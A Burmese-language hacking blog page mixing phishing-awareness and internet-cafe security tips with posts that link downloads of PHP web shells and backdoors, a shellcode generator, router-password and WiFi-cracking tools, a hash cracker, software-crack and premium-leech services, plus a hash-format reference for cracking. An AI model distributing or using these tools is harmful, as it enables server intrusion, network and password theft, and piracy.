(1)အဲဒီမွာ http:// ဆိုတာ ======= scheme ျဖစ္ပါတယ္။
ပိုမိုတဲ့ လံုျခံဳမႈကိုလိုျခင္ရင္ http:// မွာ 's' ထည့္ရိုက္ပါ။ ဥပမာ https:// ေပါ့။ 

(2) ေနာက္တစ္ခုက www ဆိုတာပါဒါေတာ့လူတိုင္းနားလည္ႏိုင္ပါတယ္။ world wide web ေပါ့။
အဂၤါျဂိဳလ္ေပၚမွာသံုးတယ္ဆိုရင္ေတာ့ mww ျဖစ္မွာေပါ့  ။Mars wide web ေပါ့.......ေနာက္တာပါ။တကယ္ မထင္နဲ႔ဦး။အဲဒီအေၾကာင္းအျပည့္အစံုသိခ်င္ရင္ ဒီကို သြားလိုက္ပါ။

(3) ေနာက္တစ္ခု google ဆိုတာဘာလဲ။ google=google ေပါ့။ေနာက္တာ ပါနာမည္တစ္ခုေပါ့။

(4) .com ဆိုတာ top level domain name  ျဖစ္ပါတယ္။ ဘယ္လိုေျပာ ရမလဲ........ Domain name ေတြက အမ်ားၾကီးရိွပါတယ္။သူ႕အဓိပါယ္နဲ႕သူေပါ့။ .com ဆိုတာ company တစ္ခုေပါ့။ org ဆိုတာ အသင္းအဖြဲ႕ျဖစ္ပါတယ္။ Organization ေပါ့။မ်ားေသာအာျဖင့္ ေစသနာ႕၀န္ထမ္းေတြျဖစ္ပါတယ္။ .net ဆို တာလဲရိွပါေသးတယ္။အဲဒါက နည္းပညာဆိုက္ေတြျဖစ္ပါတယ္။ေနာက္ထပ္အမ်ားၾကီးရိွပါေသးတယ္။
Domain name ေတြမွာေနာက္တစ္မ်ိဳးက ႏိုင္ငံအလိုက္ေခၚဆိုတာျဖစ္ပါတယ္။
ကၽြန္ေတာ္တို႕ ႏိုင္ငံ Domain က .mm ျဖစ္ပါတယ္။ဥပမာ www.example.com.mm ပါ။
ေနာက္တစ္မ်ိဳးက www.bbc.co.uk ပါ co.uk ဆိုတာ United Kingdom ကိုဆိုလိုတာျဖစ္ပါတယ္။အဲႏိုင္ငံ
အလိုက္ Top Level Domains (TLDs) ေတြကိုသိခ်င္ရင္ ဒီမွာ ေလ့လာႏိုင္ပါတယ္။
ဒါဆိုရင္ သင္တို႕က ေမးပါလိမ့္ဦးမယ္။(TLDs) ေတြၾက ရိွျပီးေတာ့တစ္ျခားေတြေကာရိွလားလို႕ေမးပါလိမ့္မယ္ ရိွပါတယ္။တျခား sub domains (SDs)
ေတြရိွပါေသးတယ္။ (SDs) ဆိုတာက သူကိုတိုင္က Domain တစ္ခုျဖစ္ေပမယ့္ လက္ခဲြတစ္ခုသာျဖစ္ပါတယ္။ (TLDs) ေတြလို သီးသန္႕မဟုတ္ပါဘူး။ ဥပမာ တစ္ခုေျပာျပပါ့မယ္။
www.example.co.cc ပါ။ သူက co.cc ဆိုတဲ့  Domain ကေန ခဲြေပးတဲ့ (SDs) တစ္ခုျဖစ္ပါတယ္။
ေျပာရမယ္ဆိုရင္ free ရတဲ့ domain ေတြပဲျဖစ္ပါတယ္။ မ်ားေသာအားျဖင့္ hacker ေတြ Phishing လုပ္ရာ မွာသံုးပါတယ္။

(5) /maps ဆိုတာ path တစ္ခုျဖစ္ပါတယ္။ ဥပမာ www.google.com/maps ဆိုတာ google.com ရဲ႕
maps ဆိုတဲ့စာမ်က္ႏွာကိုသြားမွာျဖစ္ပါတယ္။
ေနာက္ထပ္အထင္ရွားဆံုးကေတာ့ grou.ps ဆိုက္ေတြျဖစ္ျပီး free ရတဲ့ social ဆိုက္ေတြျဖစ္ပါတယ္။
အဲဒီမွာဒီလိုလာပါတယ္။ http://grou.ps/shweko/ ေျပာရရင္ေတာ့ grou.ps ရဲ႕ shwekoဆိုတဲ့path တစ္ခုပျဲဖစ္ ပါတယ္။

(6) www.google.com အာလံုးကို host name လို႕ေခၚပါတယ္။လိပ္စာအျပည့္အစံုေပါ့။

How to ?

phishing ကိုဘယ္လိုကာကြယ္မလဲ။

web စာမ်က္ႏွာ ကိုၾကည့္ရင္ ဘာပဲသံုးသံုး address bar ကိုအရင္ၾကည့္ပါ။ ဥပမာ။    ။gmail ကိုသံုးတယ္ဆိုရင္။ www.gmail.co.cc ဆိုရင္ (SDs) တစ္ခုပါ တရား၀င္မဟုတ္လို႕ gmail စာမ်က္ႏွာ အစစ္မဟုတ္ပါ။ လိမ္ထားျခင္းပါျဖစ္ပါတယ္။ www.h1.ripway/gmail/ ဆိုရင္ h1.ripway ရဲ႕ path တစ္ ခုသာျဖစ္ပါတယ္။ Domain တစ္ခုမဟုတ္လို႕လိမ္ထားတာေပၚေနပါတယ္။ သတိျပဳၾကဖို႕ပါ။

shwekoyantaw
http://www.shwekoyantaw.blogspot.com

Read More ->>

Myanmar Basic Hacking Ebook

http://www.ziddu.com/download/17691677/MyanmarBasicHackingebook.pdf.html
ဒီစာအုပ္ေလးက ကၽြန္ေတာ္သိသေလာက္ေလးေရးထားတာပါ။အတတ္နိုင္ဆံုးအေျခခံက်ေအာင္ေရးထားပါတယ္
ျပီးေတာ့ ကၽြန္ေတာ္တို႔ရဲ့ ဒီForum ေလးကိုလဲ စာအုပ္ထဲမွာ ေၾကာ္ျငာထားပါတယ္။
ကၽြန္ေတာ္တို႔ forum တြင္းညီအစ္ကိုမ်ားအေနနဲ႔ ဒီစာအုပ္ေလးကို အစ္ကိုေတာ္တို႔ရဲ့ blog ေတြမွာ...
ေၾကာ္ျငာေပးဖို႔ေတာင္းဆိုပါတယ္...........
ဒီစာအုပ္မွာ ....number of pages----42
                    Size---------------------924KB
                    Author----------------- Kglay(blind.heart7@gmail.com)
                   ကၽြန္ေတာ္ကိုယ္တိုင္ျဖစ္ပါတယ္။
source by myanmarhacking

Read More ->>

အင္တာနက္ ကဖီးမွာ သင့္ email လံုျခံဳေစခ်င္ရင္

အင္တာနက္ ကဖီးမွာ သင့္ email လံုျခံဳေစခ်င္ရင္ ေအာက္ေဖၚျပပါ အလြယ္ကူဆံုးနည္းလမ္းေတြကိုသံုးပါ။

၁။ Deepfreeze တင္ထားေသာစက္မွာထိုင္ပါ။တင္မထားရင္ထိုင္လို႕ မသင့္ပါဘူး။ကိုယ့္မွာ password က်န္ခဲ့ရင္၊ browser မွာ password မွတ္ထားရင္ keylogger ေတြထား ထားရင္။ဒီနည္းကအသံုး၀င္းပါလိမ့္မယ္။ ကိုယ္ျပန္ရင္ restart သာခ်ခဲ့ပါ။ဘာမွမက်န္ေတာ့ပါဘူး။

၂။ေနာက္ထပ္ေၾကာက္စရာေကာင္းတာကေတာ့ Phishing ပါပဲ။သူက page ေတြေမးအတုေတြလိမ္လည္ မႈေတြပါပါတယ္။ အင္တာနက္ကဖီးမွာထိုင္ရင္ ဥပမာ gmail စာမ်က္ႏွာလိုမ်ိဳၚကို browser ဖြင့္တာနဲ႕ တန္း တက္လာေၾကာက္စရာေကာင္းပါတယ္။ဒါဆိုရင္ address bar ကိုစစ္ပါ။

လိပ္စာက https://mail.google.com လို႕မလာပဲ။ http://gmail2.co.nr,http://h.1ripway/gmail/ 

စတဲ့ဆင္တူရိုးမွားေတြနဲ႕ မဟုတ္တာေတြပါတတ္ပါတယ္။ဒါေၾကာင့္မို႕ mail စစ္ခ်င္ရင္ မျပည့္အစံု ရိုက္ပါ။

ဒါမ်ိဳးေပါ့ https://mail.google.com ။မျပင္းၾကပါနဲ႕။

၃။ေနာက္ထပ္ေၾကာက္ရတာ keylogger ေတြပါ။ deepfreeze ပါရင္ မက်န္ခဲ့ေပမယ့္တခ်ိဳ႕ keylogger ေတြမွာ ေမးစနစ္ပါပါတယ္။ဒါအလြယ္ေျပာတာပါ။ပိုေျပာရင္နားရႈပ္မဆိုးလို႕ပါ။သူက ကို္ယ္သံုး ထားသမွ်ကို ကိုယ့္စက္ထဲကကေန attacker ၇ဲ႕ေမးထဲကို မိနစ္အပိုင္းျခားအလိုက္ကို ေပးပို႕ေပးႏိုင္ပါတယ္။

ဒါေၾကာင့္ notepad ကိုဖြင့္လိုက္ပါ။ ဥပမာသင့္ password က 'young' ဆိုပါေတာ့။ notepad ထဲမွာ ၀ွက္စာလုပ္ပါ။ဥပမာ uoyiiojuklnghh အဲဒီထဲက young ဆိုတာကို တလံုးျခင္း copy ကူးျပီးမွ သင့္ password field ထဲကိုထည့္ျပီးမွာ sing in လုပ္ပါ။ အဲဒီ keylogger လာလုပ္ႏိုင္မလဲၾကည့္ရေအာင္။

၄။ကိုယ္လုပ္သမွ်မက်န္ေအာင္လုပ္ပါ။ဥပမာ သင့္ browser ထဲက history မွန္သမွ်ျပန္ဖ်က္ခဲ့ပါ။ အလြန္းဆံုး remember password ကအမွန္ျခစ္ေလးေတြကိုပါျဖဳတ္ပါ။

၅။သင္အင္တာနက္ ကဖီးထဲမွာထိုင္ေနရင္းအေပါ့ အပါးသြားတာတို႕။တစ္ခုခု၀ယ္ဖို႕လိုထသြားတာေတာင္မွ

matrix screen လိုေဆာ့၀ဲမ်ိဳးကိုသံုးပါ။ဒီမွာအက်ယ္ၾကည့္ပါ။

http://shwekoyantaw.blogspot.com/2011/09/matrix-screen-locker.html

ဒါမွ မဟုတ္ရင္ ေအာက္က code ေတြကို notepad ေပၚတင္ျပီး screenlocker.bat နဲ႕ေဆ့ပါ။

code:

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg

ျပန္ထြက္ခ်င္ရင္ CTRL-ALT-DELETE နဲ႕ျပန္ထြက္လိုက္ပါ။


ဒီေလာက္ဆိုရင္အဆင္ေျပပါျပီဒါေပမယ့္ တျခားနည္းလမ္းေတြရိွေသးတာမို႕လံုျခံဳတယ္လို႕မဆိုပါဘူး။
ကၽြန္ေတာ့္သူငယ္ခ်င္းေတြကို ကၽြန္ေတာ္ေျပာသလို လံုျခံဳမႈဆိုတာ ခ်ိဳးေဖာက္ဖို႕ပါပဲလို႕................
ေရႊကိုယ္ရံေတာ္။

Read More ->>

ေဆာ့၀ဲတိုင္းကို Virus Scan စစ္ပါ။

ေဆာ့၀ဲမွမဟုတ္ဘူး ေဒါင္းလုပ္ လုပ္တဲ့ဖိုင္မွန္သမွ် scan စစ္သင့္ပါတယ္။online သံုးေနရင္ အႏၱရာယ္ဆိုတာ လက္တကမ္းမွာရိွပါတယ္။ ဥပမာ သင္ေဒါင္းခ်လိုက္တဲ့ဖိုင္ေတြထဲမွာ binder ေတြကိုသံုးထားျပီး အႏၱရာယ္ရိွႏိုင္တာေတြကို binding လုပ္ထားရင္ သင္အဲဒီဖိုင္ကိုဖြင့္လိုက္တာနဲ႕ မလိုလားအပ္တာေတြကိုသင္ၾကံဳရႏိုင္ပါတယ္။ ဒါေၾကာင့္ဘာပဲေဒါင္းေဒါင္း scan အရင္စစ္ၾကပါဆို႕။
ရမ္းသမ္းျပီးမဖြင့္ၾကပါနဲ႔လို႕။
ေအာက္ကဆိုက္မွာ စစ္လိုက္ၾကပါ။
http://myavscan.net/

Read More ->>

crack dowm software

ကိုေနေသာ့္ဆီကပဲရတာပါ။ေတာ္ေတာ္ အသံုး၀င္တာေလးပါ။မူရင္းကေတာ့
http://myanmarhacking.multiply.com/journal/item/124ကဲဒါေလးက အားကိုးရပါတယ္

shareware software ေလးေတြ ေဒါင္းထားမိျပီးဆိုရင္ လိုင္စင္ key ေတြရွာရ crack ေျဖရနဲ့

ကိုယ္တိုင္ software crack မလုပ္တက္ဘူးဆိုရင္ ဓီေကာင္ကို ေဒါင္းလိုက္ပါ

သူကေတာ့ ကိုယ္ရွာခ်င္တဲ့software ေတြရဲ့ key, crack ေတြကို အင္တာနက္ကေနျပီးေတာ့ရွာေဒါင္းေပးတဲ့ဟာေလးပါ

လိုမယ္လို့ထင္ပါတယ္

http://www.mediafire.com/?b1bg0fuc8e6rgbn
မွတ္ခ်က္။     ။ဓါတ္ပံုက ကိုယ္လုပ္ခ်င္တာတင္ ထားတာ။။။။။။။။

Read More ->>

PREMIUM LINK GENERATOR

အရင္တုန္းကလည္း တင္ေပးထားပါေသးတယ္..
အခုလင့္ေတြကေတာ့ ေနာက္ထပ္ေတြ ့ ၇ွိထားတာေလးေတြပါ...
PREMIUM Download ဆြဲခ်င္သူေတြအတြက္ ေတာ္ေတာ္အသုံး၀င္မယ္လို ့ထင္ပါတယ္..

1. http://www.myfreeleech.com/index.php
2. http://www.leechfast.us/
3. http://www.leechtorrent.info/
4. http://www.leechhat.com
5. http://www.onleech.net/
6. http://rl.adfo.us/
7. http://s1.hishare.eu/
8. http://rapidleech4you2.tk/
9. http://www.rapidleech4u.com/
10. http://www.oneleech.us/
11. http://rl.pkleech.com/
12. http://leechfire.com/
13. http://exrapidleech.info/
14. http://www.leechmax.com/index.php
15. http://freerapidleech.tipsnshare.com/
source by @ mmcracker

Read More ->>

[Win32 C++] Shell Code Generator

ကြ်န္ေတာ္တုိ ့ code ေတြကို txt ဖုိင္နဲ ့ထည့္ေပးလုိက္ပါတယ္...
C++ တတ္ကြ်မ္းထားသူမ်ား code ေတြကိုေလ့လာလုိ ့ရေအာင္ပါ..

Shell Code Generator v1.2  ျဖစ္ပါတယ္..
ကို ့ဘာသာ .exe ေျပာငး္လုိက္ၾကပါ.. code ေတြကို ေလ့လာေစခ်င္လုိ ့ txt ဖုိင္နဲ ့ထည့္ေပးလုိက္ပါတယ္..

Download :   Mediafire Zshare Easy-Share Depositfiles Wupload Filesonic
source @ mmcracker.multiply.com

Read More ->>

php shell

ဘယ္ကရတယ္ဆိုတာကိုမေမးပါနဲ႔။ကၽြန္ေတာ့္သင္ ဆရာျမင္ဆရာျဖစ္တဲ့ ကိုေသာ္ဆီကပဲေပါ့။အသံုးလိုတဲ့ သူေတြအတြက္ကေတာ့ ခ်ိဳပါလိမ့္မယ္။

တစ္ခ်ို့ ျမန္မာဆိုက္ဆိုက္ေတြမွာေတြရတယ္ php shell ေတြကို ဒါေပမဲ့ တလြဲ့ေတြခ်ဥ္ပဲ မျပည္စံုတာခ်ဥ္ပဲ

တစ္ကယ္အစစ္က ဘာလည္းဆိုတာ ျပမယ္ ေလ့လာလိုသူေတြအတြက္တင္ေပးလိုက္ပါတယ္

ပညာေရး နွင့္ ပရွိဂရမ္းမင္းေလ့လာသူေတြအတြက္ ေပါ့  ကိုယ္ဆိုက္ကာကြယခ်င္သူေတြအတြက္

c99 shell ေပါ့နာျမည္ျကီး china hacker group က  web sever ေတြကို ေဖာက္တဲ့ ေနရာမွာ သံုးသြားတာေပါ့ လြန္ပါတယ္ r57 Shell က ေတာ့ russia က ဟက္ကာေတြလက္စြဲေပါ့ လူသံုးမ်ားတဲ့ဟာေတြပဲတင္ေပးလိုက္ပါတယ္

c99 shell
r57 Shell
c100 Shell
Sniper-Sa Shell
Egy-Spider Shell
Locus Shell
FX29 Shell
Uploader
PHPjackal1.3
Mail List Maker
Cgi-Telnet
php backdoor
Safe Mode Breaker

ေဒါင္းလိုက္ပါ

http://www.mediafire.com/?i41w1ldc187h4y3

မရရင္
http://www.ziddu.com/download/17688293/allphp.rar.html

အဆင္ျပပါေစ

Read More ->>

routerpassview

ကိုေနေသာ္ဆီကရတာပါ။သူေျပာတာေတာ့ လန္ထြက္ေနေအာင္းေကာင္းတယ္ဆိုလား။
ေစာက္ရမ္းလန္းတယ္ဆိုလားပဲ.သံုးၾကည့္ေတာ့မွကၽြန္ေတာ္ေတာင္ ျပံုးစစ ျဖစ္သြားတယ္။
တကယ္ဗ်။ေဆာ့၀ဲက လန္ထြက္ေနေအာင္ အသံုးက်ပါတယ္။
မွ်ေ၀ေပးေသာ ကိုေနေသာ့္ကို ေက်းဇူးပါပဲ။သံုးနည္းေတာ့မေျပာေတာ့ပါဘူး။နည္းနည္း အႏၱရာယ္မ်ားပါ တယ္။ဒီေလာက္သိရင္ ေတာ္ေရာေပါ့ဟုတ္ဘူးလား။ေဆာ့၀ဲကေတာ့ေအာက္ကေနေဒါင္းလိုက္ပါ။

http://www.mediafire.com/?tdtb2xjz5jysb1s

Read More ->>

Aircrack WiFi Hack 2.1

A new program to hack into wi-fi signals (wireless). How many of us has a notebook or desktop PC with wireless card and this captures several Wi-Fi signals, but want to connect to one, are protected by a password, this is the solution.

Aircrack, this little program decrypts passwords and cracks these wireless signals either WEP or WAP, and so we can hang and have free internet. It also serves to prove the security level of your Wi-Fi and see how it is vulnerable to such attacks.

 

Download :  Filesonic

source @ http://mmcracker.multiply.com

Read More ->>

Recycler Virus အေၾကာင္း

memory စတစ္ကို format ခ်င္ေတာင္မွမေသတဲ့ virous ၇ွိေနပါတယ္ နာမည္က
>
> recycler
>
> copy shortcut 1
> copy shortcut 2
> copy shortcut 3
> copy shortcut 4
> autorun .inf
>
> လို့ေပါ ္ေနျပီး mini window xp ေပါ ္မွာ သတ္ရင္လည္း မ၇ပါ  avira /
> kasper/ avg/ norton/ bitdefender/ unlocker / တို ့နဲ့ သတ္ရင္လည္း
> delete လုပ္ျပီး ၃ စကၠန္ ့ေလာက္ျကာရင္ ျပန္ေရာက္လာပါတယ္


                                            Answer

Run box  မွာ  cmd လုိ ့ရုိက္လုိက္ပါ ။

အမဲေရာင္မ်က္ႏွာျပင္နဲ ့ command box က်လာပါမယ္ ။

အဲ့ဒီမွာ _ ( cursor )  ခ်ထားတဲ့ေနရာမွာ usb stick ရဲ  ့location ( ဥပမာ F or E )

F ျဖစ္လ်င္

F:\attrib -s -r -h *.*   လုိ ့ရုိက္ၿပီး enter ႏွိပ္ပါ  ။

အဲ့ဒီ အခါမွာ malicious EXE ဖုိင္ေတြအမ်ားႀကီး က်လာပါမယ္ ။

တကယ္လုိ ့ကိုယ္မလုိအပ္တဲ့ဖုိင္ဆိုရင္ F:\del autorun.inf  လုိ ့ရိုက္ၿပီး ( enter ႏွိပ္ ) ဖ်က္ပါ ။

 autorun.inf ေနရာမွာ မလုိအပ္တဲ့ malicous EXE ဖုိင္နာမည္ကို ရိုက္လုိ ့ရပါတယ္ ။

ဖ်က္ၿပီးတာနဲ ့ usb ကို ခ်က္ျခင္းျဖဳတ္လုိက္ပါ ။ 

ေနာက္တစ္ခါ virus မ၀င္ေအာင္ စက္ကုိ virus သတ္ပါ ။ usb ကုိလဲ ထိုးလိုက္တာနဲ ့ခ်က္ျခင္း မပြင့္ေအာင္ လုပ္ထားပါ ။ 

source @ http://mcxeros.multiply.com

Read More ->>

@bot.talk.google.com

ကဲ ကၽြန္ေတာ္တို. Gtalk မွာ friends ေတြမရွိတဲ.အခ်ိန္ဆို အပ်င္းလည္းေၿပ ဗဟုသုတလည္းရေအာင္ဆိုၿပီး တင္ေပးလိုက္တာပါ
ဘာသာစကားေတြမ်ားစြာကို ဖလွယ္နိုင္တာေပါ.ဗ်ာ
နိုင္ငံၿခားက ေဘာ္ဒါေတြနဲ.ေၿပာတဲ. အခါ ကိုယ္ကပဲတက္သလိုလိုနဲ.ေပါ.  ဟီးးးးးးး
(ကၽြန္ေတာ္ ကေတာ.လုပ္ေနၾကေလ မသိေသးခင္ကေတာ. လူထင္ၾကီးလို.ေပါ.)
ကဲ စေၿပာၿပီေနာ္
လိုက္ Add ၾကေပေတာ.

Arabic to English            ar2en@bot.talk.google.com               
Bulgarian - English         bg2en@bot.talk.google.com
Czech - English              cs2en@bot.talk.google.com
Danish - English             da2en@bot.talk.google.com
German - English           de2en@bot.talk.google.com
German - French            de2fr@bot.talk.google.com
Greek - English               el2en@bot.talk.google.com
Spanish - English            es2en@bot.talk.google.com
Finnish - English             fi2en@bot.talk.google.com
French - English             fr2en@bot.talk.google.com
Hindi - English                hi2en@bot.talk.google.com
Croatian - English           hr2en@bot.talk.google.com
Italian - English               it2en@bot.talk.google.com
Japanese - English         ja2en@bot.talk.google.com
Korean - English             ko2en@bot.talk.google.com
Dutch - English               nl2en@bot.talk.google.com
Norwegian - English        no2en@bot.talk.google.com
Polish - English               pl2en@bot.talk.google.com
Portuguese - English      pt2en@bot.talk.google.com
Romanian - English        ro2en@bot.talk.google.com
Russian - English           ru2en@bot.talk.google.com
Swedish - English          sv2en@bot.talk.google.com
Chinese - English           zh2en@bot.talk.google.com
Traditional Chinese -English    zh-hant2en@bot.talk.google.com
Traditional Chinese -Chinese    zh-hant2zh@bot.talk.google.com

ဒါေတြကေတာ. ဘာသာစကားေတြဖလွယ္လို.ရတဲ. အေကာင္.ေတြပါ
ကိုယ္အေကာင္.မွာ Add ၿပီး foreigner ေတြနဲ.ဆက္ေဖာနိုင္ပါေစ (အဲ ဆက္ေၿပာနိုင္ပါေစ :P)
source by  @ http://mcxeros.multiply.com

Read More ->>

little registry optimizer 1.0

ဘာရယ္လို႕မဟုတ္ဘူး မိမိ စက္ကို ထိန္းသိန္းႏိုင္းဖို႕ အသံုး၀င္လို႕တင္ေပးလိုက္တာပါ။
ကၽြန္ေတာ့္စက္ထဲမွာလဲ ဒီ tool ေလးကိုပဲတာပါ။သံုးရတာလဲလြယ္ျပီးေတာ့ ဖိုင္ဆိုက္က ေသးေသးေလးပါ။
1 MB ေက်ာ္ေက်ာ္ေလးပဲရိွတာပါ။ကိုယ့္စက္ထဲမွာ ရိွတဲ့ registry အမွားေတြကို ျပန္လည္ျပဳျပင္ေပးမွာပါ။
ထိုသီု႕ျပဳျပင္းျခင္းအားျဖင့္မိမိ ေခါင္းစားရမယ့္ ဒုကၡေတြကင္းေ၀းႏိုင္ပါတယ္။ေအာက္ကလင့္က ေနေဒါင္း လိုက္ပါ။

Downlaod

Read More ->>

Hash Code Cracker V 1.2

အသံုး၀င္ရံုစမ္းသပ္ရံု ပါပဲ။တစ္ခ်ိဳ႕ ေတာ္ေတာ္ မ်ားမ်ားျဖည္လို႕မရပါဘူး။စမး္ၾကည့္ၾကေပါ့။
download link:
http://code.google.com/p/password-cracker/downloads/detail?name=HashCodeCracker.zip&can=2&q=

Read More ->>

HASH Types password

ဘာရယ္လို႕မွမဟုတ္ဘူးဘာသာျပန္ရမွာျပင္းေနလို႕မူရင္းအတိုင္းကိုကူးထည့္ေပးလိုက္တာ။မူရင္း အတိုင္းပဲ ဖတ္လို႕ေကာင္းပါတယ္။ဘာသာျပန္လိုက္မွဘာမွန္းကိုမသိဘူးျဖစ္သြားမယ္။

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($userna me)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number '9'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number 'B'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9z YE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3 reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]

SHA-1(Django) = sha1($salt.$pass)
Example: sha1$12345678$90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd 210b
12345678 is salt (in the hexadecimal format)
90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b is SHA-1 hash.

SHA-256(Django) = SHA-256($salt.$pass)
Example: sha256$12345678$154c4c511cbb166a317c247a839e46cac6 d9208af5b015e1867a84cd9a56007b
12345678 is salt (in the hexadecimal format)
154c4c511cbb166a317c247a839e46cac6d9208af5b015e186 7a84cd9a56007b is SHA-256 hash.

SHA-384(Django) = SHA-384($salt.$pass)
Example: sha384$12345678$c0be393a500c7d42b1bd03a1a0a76302f7 f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327 f0ab70843dd5
12345678 is salt (in the hexadecimal format)
c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea63 73659d0bd8675d04e12d8016d83001c327f0ab70843dd5 is SHA-384 hash.

SHA-1(ManGOS) = sha1(strtoupper($username).':'.$pass)

SHA-1(ManGOS2) = sha1($username.':'.$pass)

MD5(Custom) = '=='.md5(md5(md5($pass).md5($pass).md5($pass).md5( $pass)))

md5(3 x strtoupper(md5($pass))) = md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($ pass)))))))




Notes:-

[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).

[2] The hash is to be loaded to the program in full, to the "Hash" column - the program will automatically extract the salt and other required data from it.

[3] The ':' character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.

[4] Salt can contain special characters - single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a'4 instead of a\'4, as well as the salts a"4 instead of a\"4 and a\4 instead of a\\4.

Read More ->>

uharc/ GUI

